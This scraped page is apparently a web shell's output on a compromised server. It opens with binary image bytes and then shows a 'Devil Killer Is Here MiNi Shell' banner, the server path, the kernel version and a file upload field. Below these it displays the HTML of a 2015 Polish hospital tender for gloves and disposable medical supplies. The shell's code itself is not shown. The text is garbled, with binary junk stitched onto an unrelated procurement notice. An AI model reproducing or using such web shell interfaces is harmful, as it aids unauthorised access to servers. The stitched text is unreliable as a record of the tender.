JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151204/178767-N-2015.html

<p class="kh_header"><b>Pruszków: Dostawę rękawic i sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie</b><br>
<b>Numer ogłoszenia: 178767 - 2015; data zamieszczenia: 04.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Armii Krajowej 2/4, 05-800 Pruszków, woj. mazowieckie, tel. 022 7588002, faks 022 7287138.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpitalnawrzesinie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę rękawic i sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż  i dostawa  sprzętu medycznego jednorazowego użytku i rękawic medycznych dla potrzeb SPZZOZ w Pruszkowie (z podziałem na 9 zadań - części) w następujących rodzajach i ilościach składających się odpowiednio na pakiety nr. 1- 9. Szczegółowe ilości i rodzaje sprzętu jednorazowego użytku składające się na poszczególne pakiety zawierają załączniki  2.1- 2.9..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1)	posiadają uprawnienia  do wykonywania określonej, w  specyfikacji istotnych warunków zamówienia, działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponowali potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)	nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2 ustawy z dnia 29 stycznia  2004r. Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają niezbędną wiedzę i doświadczenie oraz dysponują lub będą dysponowali potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalnawrzesinie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Pruszkowie 
05-800 Pruszków  ul. Armii Krajowej 2/4 - budynek Administracji- pok. Administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2015 godzina 09:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Pruszkowie 
05-800 Pruszków  ul. Armii Krajowej 2/4- pok. Z-cy Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawę rękawic i sprzętu jednorazowego użytku dla potrzeb SPZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	 Rękawiczki chirurgiczne sterylne beztalkowe 6    (op.= 50par)	50 op.
2	 Rękawiczki chirurgiczne sterykne beztalkowe 6,5 (op.= 50par)	161op.
3	 Rękawiczki  chirurgiczne sterykne beztalkowe 7 (op.= 50par)	266 op.
4	 Rękawiczki  chirurgiczne sterykne beztalkowe   7,5 (op.= 50par)	 346 op.
5	 Rękawiczki  chirurgiczne sterykne beztalkowe  8    (op.= 50par)	292 op
6	Rękawiczki  chirurgiczne sterykne beztalkowe 8,5 (op.= 50par)	 30op
7	Rękawiczki  chirurgiczne sterykne pudrowane 6,5 (op.= 50par)	62 op.
8	Rękawiczki  chirurgiczne sterykne pudrowane 7 (op.= 50par)	60 op
9	Rękawiczki  chirurgiczne sterykne pudrowane 7,5 (op.= 50par)	72 op
10	Rękawiczki  chirurgiczne sterykne pudrowane 8 (op.= 50par)	56 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rękawice nitrylowe  bezpudrowe (op.=100szt)XS
	   200op.
2	Rękawice nitrylowe  bezpudrowe (op.=100szt)S
	 3 000op
3	Rękawice nitrylowe   bezpudrowe (op.=100szt)M
	5 000op
4	Rękawice nitrylowe   bezpudrowe(op.=100szt) L
	3 000op
5	Rękawice nitrylowe   bezpudrowe(op.=100szt)X L
	  500op
6	Rękawice foliowe
	30 000
 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa sprzętu medycznego jednorazowego użytku i rękawic medycznych dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rękawice nitrylowe  bezpudrowe (op.= 250szt)S
	  100op
2	Rękawice nitrylowe bezpudrowe (op.= 250szt)M
	 200op
3	Rękawice nitrylowe   bezpudrowe(op.= 250szt) L
	  100op
4.	Rękawice nitrylowe bezpudrowe
( opakowanie - 50szt.) M	   36 op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wkłady do basenów jednorazowe, torba osłonowa na basen zawierająca wkładkę absorpcyjną  oraz   zamknięcie -wyrób medyczny klasy I - 1op.=20szt	400 op.
2	Wkłady do kaczek jednorazowe ,torba osłonowa zawierająca wkładkę absorpcyjną  oraz zamknięcie- wyrób medyczny klasy I - 1op=20szt	10op.
3	Worki na wymiociny jednorazowe torba osłonowa zawierająca wkładkę absorpcyjną  oraz zamknięcie- wyrób medyczny klasy I-  1op.=20szt	200op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemniki chirurgiczny             15ml  zakręcane- przezroczyste	1200 szt.
Pojemniki chirurgiczny              30ml zakręcane- nprzezroczyste	2 800 szt.
Pojemniki chirurgiczne             50 ml zakręcane	200 szt.
Pojemniki chirurgiczny           100 ml zakręcane	1 000 szt.
Pojemniki chirurgiczny           200 ml zakręcane	500szt.
Pojemniki chirurgiczny           500 ml zamykane	150 szt.
Pojemniki chirurgiczny          1000ml zamykane	100 szt.
Pojemniki chirurgiczny          3000ml zamykane	100 szt.
Pojemniki chirurgiczny          5000ml zamykane	150 szt.
Pojemniki chirurgiczny       10 000ml zamykane	80 szt.
Pojemniki na odpady med.  30 000ml zamykane	120szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkłady papierowe -białe dwuwarstwowe, celuloza, szerokość 500mm, długość 65m, gramatura 1m2=19g/m2  	3200 rol.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa sprzętu medycznego jednorazowego użytku dla potrzeb SP ZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczniki papierowe  typu ZZ składane, szare o wym. szer. 23cm. dł. 25cm. gramatura 38g/m2 1op=4000 listków	op.	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa sprzętu medycznego jednorazowego użytku dla potrzeb SP ZZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Krepowy papier medyczny o gramaturze 60 g/m2 do pakowania materiałów sterylizowanych parą wodną i tlenkiem etylenu.						
Rozmiar 100x100 (cm) pakowany na przemiennie mix biały i zielony pakowany po 250 arkuszy	op.	48				
Rozmiar 90x90 (cm) pakowany na przemiennie mix biały i zielony pakowany po 250 arkuszy	op.	48				
Włóknina medyczna o gramaturze 57-60 g/m2 odporna na pęknięcia, wypukliny i rozdzieranie						
Rozmiar 100x100 (cm) pakowana po 250 arkuszy	op.	24				
Rękawy foliowo - papierowe, płaskie, ze wskaźnikami do sterylizacji w parze wodnej, tlenku etylenu i formaldehydzie o rozmiarach:						
5 cm x 200mb	szt.	24				
7,5 cm x 200mb	szt.	24				
10 cm x 200mb	szt.	48				
12 cm x 200mb	szt.	96				
15 cm x 200m	szt.	96				
20 cm x 200mb	szt.	96				
30 cm x 200mb	szt.	24				
Rękawy foliowo - papierowe z fałdą, ze wskaźnikami do sterylizacji w parze wodnej, tlenku etylenu i formaldehydzie o rozmiarach:						
7,5 cm x 2,5 cm x 100mb	szt.	24				
15 cm x 5 cm x 100mb	szt.	48				
20 cm x 5 cm x 100mb	szt.	48				
25 cm x 6 cm x 100mb	szt.	24				
30 cm x 6 cm x 100mb	szt.	24				
Torebki do sterylizacji foliowo - papierowe, samoprzylepne, ze wskaźnikami do sterylizacaji w parze wodnej i tlenku etylenu o rozmiarach:						
20 cm x 35 cm . Opakowanie 100 szt.	op.	48				
13 cm x 25 cm. Opakowanie 100 szt.	op.	48				
Wymagania dotyczące papierowo foliowych opakowań do sterylizacji (pozycje III, IV i V) a) gramatura papieru minimum 60g/m, papier o odpowiedniej porowatości, układ por stanowi barierę dla drobnoustrojów po procesie sterylizacji b) laminat foliowy o grubości min 51 ?m składająca się z siedmiu warstw; c) zaznaczony kierunek otwierania (pozwalający na bezpyłowe otwieranie) po obu stronach opakowania: d) zaznaczony znak CE znajdujący się po obu stronach opakowania d) wielorowkowy zgrzew na opakowaniach szerokości min 6 mm (strefa zgrzewu min 1 cm); e) papier wytrzymały na rozdzieranie, odporny na przesiąkanie i przepuklenia; f) wskaźniki procesu sterylizacji nadrukowane na papierze w obrębie zgrzewu, po stronie folii; g) folia odporna na rozdzieranie i pękanie; h) opakowania zawierają: numer serii, rozmiar oraz napisy w języku polskim, i) opakowania spełniają normę PN EN 868 -5, PN EN 11607 - 1 j) V - kształtny zgrzew i wycięcie na kciuk ułatwiające i przyspieszające otwieranie opakowania w bezpieczny sposób, oraz umieszczenie wyrobu w opakowaniu (dotyczy torebek do sterylizacji).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 26.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieluchomajtki dla dorosłych: 
- rozmiar M (nocne - podwyższona chłonność) 
- obwód 73-122cm,lub 75-110cm 
- posiadające delikatny elastyczny ściągacz w pasie z przodu i z tyłu lub jeden ściągacz taliowy w tylnej części produktu, 
- podwójne elastyczne przylepcorzepy, 
- wskaźnik wilgotności w postaci co najmniej jednego paska zmieniającego kolor podczas napełnienia się produktu, 
- produkt oddychający na całej powierzchni (warstwy boczne jak również wewnętrzna oraz zewnętrzna strona wkładu chłonnego), 
- dwie warstwy celulozy, 
- posiadające falbanki oraz barierki uniemożliwiające wypłynięcie zawartości (skierowane do wewnątrz lub na zewnątrz),
- Chłonność co najmniej 2800 g - potwierdzone jawną dla innych wykonawców kartą produktową / kartą techniczną (ISO 11948-1)
Opakowanie 30 szt.
	
1140


Pieluchomajtki dla dorosłych:
-  rozmiar L (nocne - podwyższona chłonność)
- obwód 92-144cm,lub 100-150cm
- posiadające delikatny elastyczny ściągacz w pasie z przodu i z tyłu lub jeden ściągacz taliowy w tylnej części produktu,
- podwójne elastyczne przylepcorzepy, 
- wskaźnik wilgotności w postaci co najmniej jednego paska zmieniającego kolor podczas napełnienia się produktu, 
- produkt oddychający na całej powierzchni (warstwy boczne jak również wewnętrzna oraz zewnętrzna strona wkładu chłonnego), 

- dwie warstwy celulozy, 
- posiadające falbanki oraz barierki uniemożliwiające wypłynięcie zawartości (skierowane do wewnątrz lub na zewnątrz),
- Chłonność co najmniej 3000 g - potwierdzone jawną dla innych wykonawców kartą produktową / kartą techniczną (ISO 11948-1).
Opakowanie 30 szt.
	21 540
Pieluchomajtki dla dorosłych: 
- rozmiar M (dzienne)
- obwód 73-122cm,lub 75-110cm 
- posiadające delikatny elastyczny ściągacz w pasie z przodu i z tyłu lub jeden ściągacz taliowy w tylnej części produktu, 
- podwójne elastyczne przylepcorzepy, 
- wskaźnik wilgotności w postaci co najmniej jednego paska zmieniającego kolor podczas napełnienia się produktu, 
- produkt oddychający na całej powierzchni (warstwy boczne jak również wewnętrzna oraz zewnętrzna strona wkładu chłonnego), 
- dwie warstwy celulozy, 
- posiadające falbanki oraz barierki uniemożliwiające wypłynięcie zawartości (skierowane do wewnątrz lub na zewnątrz),
- Chłonność co najmniej 2400 g - potwierdzone jawną dla innych wykonawców kartą produktową / kartą techniczną (ISO 11948-1).
Opakowanie 30 szt.
	2 250
Pieluchomajtki dla dorosłych: 
- rozmiar L (dzienne)
- obwód 92-144cm,lub 100-150cm 
- posiadające delikatny elastyczny ściągacz w pasie z przodu i z tyłu lub jeden ściągacz taliowy w tylnej części produktu, 
- podwójne elastyczne przylepcorzepy, 
- wskaźnik wilgotności w postaci co najmniej jednego paska zmieniającego kolor podczas napełnienia się produktu, 
- produkt oddychający na całej powierzchni (warstwy boczne jak również wewnętrzna oraz zewnętrzna strona wkładu chłonnego), 
- dwie warstwy celulozy, 
- posiadające falbanki oraz barierki uniemożliwiające wypłynięcie zawartości (skierowane do wewnątrz lub na zewnątrz),
- Chłonność co najmniej 2700 g - potwierdzone jawną dla innych wykonawców kartą produktową / kartą techniczną (ISO 11948-1).
Opakowanie 30 szt.
	43 050

Podkład higieniczny z wkładem chłonnym z pulpy celulozowej, zabezpieczony od spodu folią antypoślizgową, 60x 90cm, chłonność co najmniej 1700 g - potwierdzone jawną dla innych wykonawców kartą produktową / kartą techniczną (ISO 11948-1) 
	12 240
Śliniaki jednorazowe wykonane z podfoliowanej bibuły celulozowej, wiązane na szyi z wywiniętą kieszenią w dolnej części. Rozmiar min. 37x 48cm cm (szerokość x długość)	2400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
